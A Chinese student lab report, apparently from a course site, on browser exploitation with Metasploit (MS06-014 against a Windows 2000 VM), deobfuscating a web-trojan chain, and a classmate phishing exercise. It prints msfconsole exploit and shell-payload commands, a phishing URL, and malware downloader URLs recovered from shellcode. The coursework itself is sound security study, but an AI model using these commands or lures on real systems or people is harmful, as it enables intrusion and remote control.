54
社区成员
发帖
与我相关
我的任务
分享20231908余卓洲 2023-2024-2 《网络攻防实践》实践十一报告
1.实践内容
(1)web浏览器渗透攻击
使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
(2)取证分析实践—网页木马攻击场景分析
(3)攻防对抗实践—web浏览器渗透攻击攻防
攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。
2.实践过程
2.1web浏览器渗透攻击
实验环境
攻击机 靶机
192.168.200.3(kali) 192.168.200.124(Win2k)
实践过程
①选择使用Metasploit中的MS06-014渗透攻击模块
②选择PAYLOAD为任意远程Shell连接
③设置服务器地址和URL参数,运行exploit,构造出恶意网页木马脚本
④在靶机环境中启动浏览器,验证与服务器的连通性,并访问而已网页木马脚本URL
⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令
首先测试攻击机和靶机的连通性:
在Kali上使用 msfconsole 打开Metasploit:
利用search MS06-014搜索MS06-014漏洞,并使用http://192.168.10.201:8080/8TiOk0qkEi
利用set payload generic/shell_reverse_tcp 设置载荷,使用show options查看其他设置
最后进行exploit,生成URL:http://192.168.200.3:8080/7R3SX3LPaU186N
靶机使用浏览器访问该URL:
此时攻击机得到一个会话,输入sessions -i 1选择会话1,返回shell,输入ipconfig 查看靶机的IP地址信息,攻击成功。
2.2取证分析实践—网页木马攻击场景分析
实践过程
①首先你应该访问start.html,在这个文件中给出了new09.htm的地址,
②在进入 htm 后,每解密出一个文件地址,请对其作 32 位 MD5 散列,以散列值为文件名到 http://192.168.68.253/scom/hashed 哈希值下去下载对应的文件(注意:文件名中的英文字母为小写,且没有扩展名),即为解密出的地址对应的文件。
③如果解密出的地址给出的是网页或脚本文件,请继续解密。
④如果解密出的地址是二进制程序文件,请进行静态反汇编或动态调试。
⑤重复以上过程直到这些文件被全部分析完成。
首先将start.html文件的内容导出来
打开下载的start.html文件,寻找new09.htm,可以找到,如下图所示。
可以发现new09.htm在被引用时,使用的是相对路径而不是绝对路径,因此new09.htm与start.html必须处于同一文件目录下;
查看new09.htm文件,可以发现他有引用了两个文件,一个是在iframe标签中的http://aa.18dd.net/aa/kl.htm ,另一个是js标签中的http://js.users.51.la/1299644.js
对这两个网址分别做MD5散列
http://aa.18dd.net/aa/kl.htm 的MD5的散列值为:7f60672dcd6b5e90b6772545ee219bd3
http://js.users.51.la/1299644.js 的MD5的散列值为:23180a42a2ff1192150231b44ffdf3d3
在hashed文件夹里面找到这两个链接散列值的文件:
打开这两个文件查看其内容:
第一个没发现有用的信息
第二个发现其使用了XXTEA+Base64 加密方法
(5)上图中可找到加密密钥为:\x73\x63\x72\x69\x70\x74,将其转为ASCII码后为script,如下:
得到密码是script
找一个XXTEA的在线解密工具,对相关密文进行解密,注意要解密的部分是t的内容,如下:
再对其进行十六进制解密,得到如下代码:
这个文件简直就是一个木马群,利用到的应用程序漏洞有
“Adodb.Stream”、“MPS.StormPlayer”、“POWERPLAYER.PowerPlayerCtrl.1”和BaiduBar.Tool”,分别对应利用了微软数据库访问对象、暴风影音、PPStream和百度搜霸的漏洞。
同时可发现得到三个js文件以及一个cab文件,都可在hashed文件夹中找到。
首先查看1.js文件,如下:
对其进行十六进制解密后得到以下代码:
再打开b.js文件,发现packed字样,推测可能是采用了pack加密,如下:
发现关键字shellcode,这里很可能是一个下载器,对于一个下载器来说,必不可少的一项内容就是要下载的内容的UL,不妨找找这加密的代码里有URL特征的字符串。根据URL中必然出现的斜线“/”,“/”的十六进制ASCII码是2F,那么我们就寻找里边的“2F”即可。
在这里推测从第三个2f开始到末尾的部分可能为网址或者是网址的一部分,转换后
发现推测正确,得到网址:http://down.18dd.net/bb/bf.exe%E3%80%82
(10)紧接着打开pps.js文件分析,如下:
发现采用了八进制加密,转换后如下:
不难发现该代码也是利用下载器shellcode,下载的文件为:http://down.18dd.net/bb/pps.exe
(11)获取前三个文件:014.exe、bf.exe、pps.exe文件的md5值如下:
http://down.18dd.net/bb/014.exe :ca4e4a1730b0f69a9b94393d9443b979
http://down.18dd.net/bb/bf.exe%EF%BC%9A268cbd59fbed235f6cf6b41b92b03f8e
http://down.18dd.net/bb/pps.exe :ff59b3b8961f502289c1b4df8c37e2a4
找到相关文件,不难发现大小均相同,接着计算三个文件的md5值,发现一致,因此这三个文件为同一文件。
可以发现其不仅从各个URL上下载木马,同时这个程序可能生成一个叫"A11 etdel.bat"的批处理文件,这个文件中有一个标签叫"try",批处理文件会不断的执行这个标签下一行的命令,命令内容可能是判断文件存在性,更改系统日期,删除某些文件等等。
并且,其会对IE、注册表、服务和系统文件动点手脚,还有一定的防系统保护软件能力等等。
2.3攻防对抗实践—web浏览器渗透攻击攻防
本次实验由我和20231908余卓洲共同完成
(1)作为攻击方:
攻击方主机(20231908余卓洲)
防守方主机(20231914严梓洋)
启动msfconsole,进行针对MS06-014漏洞进行的攻击
并且输入指令
use exploit/windows/browser/ie_createobject
set payload windows/shell/bind_tcp
set lhost 192.168.1.110
set RHOST 192.168.1.102
exploit
通过电子邮件将构造的钓鱼网站 http://192.168.1.110:8080/yqladLvaE6 发给防守方同学,防守方同学点进去网站以后终端会出现"command shell session 1 opened"的字样,紧接着输入指令
sessions
sessions -i 1
打开会话,并用ipconfig查看IP地址进行验证,发现获取到防守方的Shell
作为防守方 :
攻击方主机(20231914严梓洋)
防守方主机(20231908余卓洲)
访问攻击方发来的钓鱼网址http://192.168.1.110:8080/yqladLvaE6
查看该网页的源代码
在物理机上打开网址:https://www.bejson.com/jshtml_format/?_t=t 使用工具对网页源代码进行压缩,如下:
发现该恶意代码调用了document.location运行攻击载荷,并且附加了可执行文件wgyXrKCYAQfindtld.exe,该文件下载后会运行在后台,同时还会不断变化自己的运行程序PID,躲避查杀。
查看任务管理器,发现存在该exe文件,且在运行中
百度查询压缩后的代码中的相关Array,发现确实为MS06-014漏洞
3 遇到的问题
1)虚拟机无法连接网络
解决方案:要设置成桥接模式,并且虚拟网络编辑器设置成本地物理网卡。并且把IP地址改成自动获取。
4 实践总结
通过这次实践,我进一步深入学习了取证分析和网络木马分析等关键操作,还加深了对HTTP协议和MD5等技术的理解。特别是在探索web浏览器安全漏洞时,我深刻体会到了网络安全保障的重要性,这次经历使我对网络安全的整体概念有了更加深刻的领悟。
...全文
请发表友善的回复…
发表回复
